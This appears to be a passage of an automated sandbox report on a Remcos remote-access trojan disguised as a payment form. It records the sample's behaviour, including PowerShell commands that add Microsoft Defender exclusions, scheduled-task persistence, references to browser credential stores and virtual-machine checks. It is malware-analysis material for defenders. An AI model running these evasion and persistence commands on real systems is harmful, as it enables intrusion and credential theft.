              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 9_2_0040B28E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 9_2_0040838E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 9_2_004087A0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 9_2_00407848
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004068CD FindFirstFileW,FindNextFileW, 9_2_004068CD
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0044BA59 FindFirstFileExA, 9_2_0044BA59
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 9_2_0040AA71
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 9_2_00417AAB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 9_2_0040AC78
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 9_2_00406D28
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Thread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exe - Thread delayed: delay time: 922337203685477
              Source: remcos.exe, 00000021.00000002.1773191816.0000000007320000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-
              Source: remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.3782308386.0000000001560000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429762645.0000000007520000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_004327AE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 9_2_0041A8DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004407B5 mov eax, dword ptr fs:[00000030h] 9_2_004407B5
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 9_2_00410763
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_004327AE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004328FC SetUnhandledExceptionFilter, 9_2_004328FC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_004398AC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00432D5C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory written: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe base: 400000 value starts with: 4D5A
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory written: C:\ProgramData\AppUpdate\remcos.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 9_2_00410B5C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_004175E1 mouse_event, 9_2_004175E1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
              Source: C:\Windows\SysWOW64\wscript.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exe - Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerj
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager5
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managert
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`
              Source: remcos.exe, 00000017.00000002.3782308386.0000000001540000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_004329DA cpuid 9_2_004329DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: EnumSystemLocalesW,9_2_0044F17B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: EnumSystemLocalesW,9_2_0044F130
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: EnumSystemLocalesW,9_2_0044F216
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F2A3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoA,9_2_0040E2BB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoW,9_2_0044F4F3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0044F61C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoW,9_2_0044F723
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F7F0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: EnumSystemLocalesW,9_2_00445914
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: GetLocaleInfoW,9_2_00445E1C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_0044EEB8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Queries volume information: C:\Windows\Fonts\micross.ttf
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Queries volume information: C:\Users\user\AppData\Roaming\iKgKaogJ.exe
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\
              Source: C:\ProgramData\AppUpdate\remcos.exe | Queries volume information: C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\ProgramData\AppUpdate\remcos.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040A0B0 GetLocalTime,wsprintfW,9_2_0040A0B0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004195F8 GetUserNameW,9_2_004195F8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_004466BF
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

Source: Yara match | File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 9_2_0040A953
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 9_2_0040AA71
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: \key3.db 9_2_0040AA71

              Remote Access Functionality

Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: Yara match | File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
